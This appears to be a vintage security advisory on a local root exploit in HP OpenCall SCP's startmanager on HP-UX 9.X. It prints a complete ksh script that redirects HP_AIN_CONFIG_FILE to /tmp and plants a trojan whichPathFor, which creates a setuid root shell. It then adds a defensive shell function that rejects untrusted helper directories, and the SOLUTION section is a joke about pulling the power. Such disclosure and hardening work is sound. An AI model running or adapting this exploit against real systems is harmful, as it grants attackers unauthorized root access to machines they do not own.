COMMAND

    startmanager

SYSTEMS AFFECTED

    HP 9000 series 800s (HP-UX 9.X release)

PROBLEM

    SoD (Scriptors of Doom) and their guest Otto Sync were playing with
    OpenCall SCP and, as expected, broke the toy.  The toy is the system
    listed above, and the exploit follows.

    Many of the SCP utilities call a binary called whichPathFor, and the
    directory they look for it in is read from a config file whose path
    comes from the HP_AIN_CONFIG_FILE environment variable.  Obviously HP
    needs help handling their directory structure; see below how we
    point the config file at our own directory to fool them into
    executing our own version of whichPathFor.

        #!/bin/ksh
        if [[ -a /tmp/shell ]]
        then
          rm -f /tmp/shell
        fi
        HP=$HP_AIN_CONFIG_FILE
        echo "bins   = /tmp\n" > /tmp/config
        mkdir /tmp/SS7
        mkdir /tmp/SS7/bin
        echo "cp /bin/sh /tmp/shell ; chmod 4755 /tmp/shell ;
        /opt/HP-AIN/SS7/bin/whichPathFor $*" > /tmp/SS7/bin/whichPathFor
        chmod +x /tmp/SS7/bin/whichPathFor
        export HP_AIN_CONFIG_FILE=/tmp/config
        ST=$$
        startmanager > /dev/null &
        sleep 2
        kill `expr $ST + 5`
        export HP_AIN_CONFIG_FILE=$HP
        rm -rf /tmp/SS7
        rm -f /tmp/config
        echo "A root shell from the Alps ...\n"
        /tmp/shell
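    The weakness the script above relies on is a privileged program
    resolving a helper binary from a directory named in a config file
    that an unprivileged user chooses through an environment variable.
    The following check is an added example, not part of the SoD advisory
    or of HP's code: it parses the same "bins = <dir>" line the exploit
    writes, and refuses to resolve a helper unless the directory is an
    absolute path, exists, is owned by the expected user (root by
    default) and is not writable by group or others.  Function names,
    the config syntax and the directory layout are assumptions made for
    this example.

```sh
#!/bin/sh
# Added example (not from the advisory or from HP): fail-closed resolution
# of a helper binary named in a "bins = <dir>" config line.

parse_bins_dir() {
    # Print the value of the first "bins = <dir>" line in config file $1.
    sed -n 's/^[[:space:]]*bins[[:space:]]*=[[:space:]]*\([^[:space:]]*\).*/\1/p' "$1" | head -n 1
}

dir_is_trusted() {
    # $1 = directory, $2 = expected owner (defaults to root).
    # Trusted only if absolute, existing, owned by $2, and not group/world writable.
    d=$1
    want_owner=${2:-root}
    case "$d" in
        /*) ;;
        *)  return 1 ;;          # relative paths are never acceptable
    esac
    [ -d "$d" ] || return 1
    # ls -ld: "<perms> <links> <owner> <group> ..." on both GNU and BSD ls.
    set -- $(ls -ld "$d")
    perms=$(printf '%s' "$1" | cut -c1-10)   # drop any trailing ACL marker (+ or @)
    owner=$3
    [ "$owner" = "$want_owner" ] || return 1
    case "$perms" in
        ?????w????) return 1 ;;  # group-writable
        ????????w?) return 1 ;;  # world-writable (the /tmp case in the exploit)
    esac
    return 0
}

resolve_helper() {
    # $1 = config file, $2 = helper name, $3 = expected owner (optional).
    # Prints the full helper path, or returns non-zero if the bins dir is untrusted.
    bins=$(parse_bins_dir "$1")
    [ -n "$bins" ] || return 1
    dir_is_trusted "$bins" "$3" || return 1
    printf '%s\n' "$bins/$2"
}
```

    With the exploit's own config ("bins   = /tmp") the resolution fails
    because /tmp is world-writable, so the trojaned whichPathFor is never
    found.  The ownership check is what matters on a setuid program: a
    path that is merely not world-writable but owned by the invoking
    user would still be under that user's control.  The deeper fix is
    for a privileged program to ignore HP_AIN_CONFIG_FILE from its
    environment altogether and use a compiled-in config path.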

SOLUTION

    :-)  (it means that I will only quote part of the "SoD advisory")
    Locate the main power switch and press it.  This will mess up your
    filesystem, piss off your customers and interrupt every IN call in
    progress.